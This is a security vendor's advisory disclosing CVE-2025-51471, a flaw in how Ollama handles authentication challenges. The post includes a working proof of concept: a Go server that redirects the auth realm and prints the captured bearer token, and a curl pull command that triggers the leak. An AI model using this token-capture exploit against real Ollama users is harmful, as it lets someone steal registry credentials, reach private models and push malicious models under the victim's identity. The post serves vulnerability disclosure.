Skip to content
CVE-2025-51471: Ollama Cross-Domain Authentication Token Exposure

CVE-2025-51471: Ollama Cross-Domain Authentication Token Exposure

Grayscale portrait of a young man looking left, wearing a striped lanyard, with an olive green dot pattern background.Artemiy Malyshau· Co-founder & CTO1 min read

Key takeaways

  • Ollama’s authentication flow contains a vulnerability in its model pulling mechanism.

Original finding credits:#

Below is our duplicate finding. Edit made on October 13th, 2025.

Description#

Ollama’s authentication flow contains a vulnerability in its model pulling mechanism. When a user pulls a model from an HTTPS server that responds with a 401 Unauthorized status, Ollama follows the WWW-Authenticate header’s realm URL without validating if it belongs to the same domain as the original request. This allows an attacker to redirect the authentication flow to any domain, including registry.ollama.ai, and capture valid authentication tokens.

The issue exists in the authentication challenge handling logic, where Ollama does not verify that the authentication realm in the WWW-Authenticate header is from the same domain as the initial request. This enables cross-domain authentication flow redirection and token stealing.

Proof of Concept#

This PoC demonstrates how an attacker can steal valid registry.ollama.ai authentication tokens:

  1. Start the Ollama server:
<code class="hljs language-bash">go run main.go serve
</code>
  1. Create token-capture server (token_capture.go):
<code class="hljs language-go"><span class="hljs-keyword">package</span> main

<span class="hljs-keyword">import</span> (
    <span class="hljs-string">"fmt"</span>
    <span class="hljs-string">"log"</span>
    <span class="hljs-string">"net/http"</span>
)

<span class="hljs-function"><span class="hljs-keyword">func</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span> {
    http.HandleFunc(<span class="hljs-string">"/"</span>, <span class="hljs-function"><span class="hljs-keyword">func</span><span class="hljs-params">(w http.ResponseWriter, r *http.Request)</span></span> {
        fmt.Printf(<span class="hljs-string">"Request: %s %s\n"</span>, r.Method, r.URL.String())
        
        <span class="hljs-keyword">if</span> r.Header.Get(<span class="hljs-string">"Authorization"</span>) == <span class="hljs-string">""</span> {
            w.Header().Set(<span class="hljs-string">"WWW-Authenticate"</span>, <span class="hljs-string">`Bearer realm="https://registry.ollama.ai/v2/token",service="ollama",scope="-"`</span>)
            w.WriteHeader(http.StatusUnauthorized)
            w.Write([]<span class="hljs-type">byte</span>(<span class="hljs-string">"Unauthorized"</span>))
            <span class="hljs-keyword">return</span>
        }
        
        fmt.Printf(<span class="hljs-string">"STOLEN TOKEN: %s\n"</span>, r.Header.Get(<span class="hljs-string">"Authorization"</span>))
        w.WriteHeader(http.StatusTeapot)
        w.Write([]<span class="hljs-type">byte</span>(<span class="hljs-string">"Token captured"</span>))
    })
    
    log.Fatal(http.ListenAndServe(<span class="hljs-string">":8000"</span>, <span class="hljs-literal">nil</span>))
}
</code>
  1. Run the token capture server:
<code class="hljs language-bash">go run token_capture.go
</code>
  1. Trigger the vulnerability:
<code class="hljs language-bash">curl http://localhost:11434/api/pull -d <span class="hljs-string">'{
  "model": "http://127.0.0.1:8000/{model}",
}'</span>
</code>
  1. Observe the stolen token in the server output.

Impact#

This vulnerability allows attackers to:

  • Steal authentication tokens for registry.ollama.ai by tricking users into pulling models from malicious servers
  • Access private models the user has permission to access in the registry
  • Push malicious models under the victim’s identity if they have write access
Grayscale portrait of a young man looking left, wearing a striped lanyard, with an olive green dot pattern background.

Artemiy Malyshau

Co-founder & CTO

Artemiy served in an elite unit of the Austrian Cyber Forces, defending national infrastructure He was then the first employee at a government-backed cybersecurity research group, where he led security projects for Interpol and national governments. At Gecko he builds the platform trusted to sit inside Fortune 500 codebases, and holds it to the standard those governments taught him.

Frequently asked questions

Related content

The latest news, technologies, and resources from our team.

Subscribe to the Gecko Security newsletter

Occasional updates, new content, and insights. No spam; unsubscribe anytime.

We use your email only to send you our newsletter. See our privacy policy for how we handle your data. You can unsubscribe at any time.